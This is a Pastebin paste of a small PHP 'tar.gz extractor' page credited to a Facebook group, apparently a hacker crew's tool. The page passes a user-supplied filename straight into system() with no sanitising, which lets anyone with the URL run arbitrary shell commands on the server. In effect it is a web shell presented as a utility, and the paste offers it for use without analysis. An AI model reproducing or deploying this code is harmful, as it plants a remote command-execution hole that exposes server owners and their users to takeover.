andripzf

[PHP] [DM] tar.gz extractor

Mar 12th, 2014
407
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.56 KB | None | 0 0
  1. <html><head>
  2. <title>DM.TAR.GZ Extractor</title>
  3. </head><body>
  4. <center><form method="POST">
  5. <nobr>File tar.gz : <input type="text" size="20" name="targz"><br /><br /></nobr>
  6. <input type="submit" name="dmextract" value="ExtracT" ><br /><br />
  7. </form>
  8. Coded By <a href="http://www.facebook.com/groups/D.MASTERPIECE">FB GROUP DM</a></center>
  9. </body></html>
  10. <?php
  11. if(isset($_POST['dmextract'])) {
  12. echo "<div align='center'>";
  13. $extractsempak="tar -zxvf ".$_POST['targz']."";
  14. system($extractsempak);
  15. echo "<br /><pre>Extract Selesai</pre>";
  16. }
  17. echo "</div>";
  18. ?>
Advertisement
Add Comment
Please, Sign In to add comment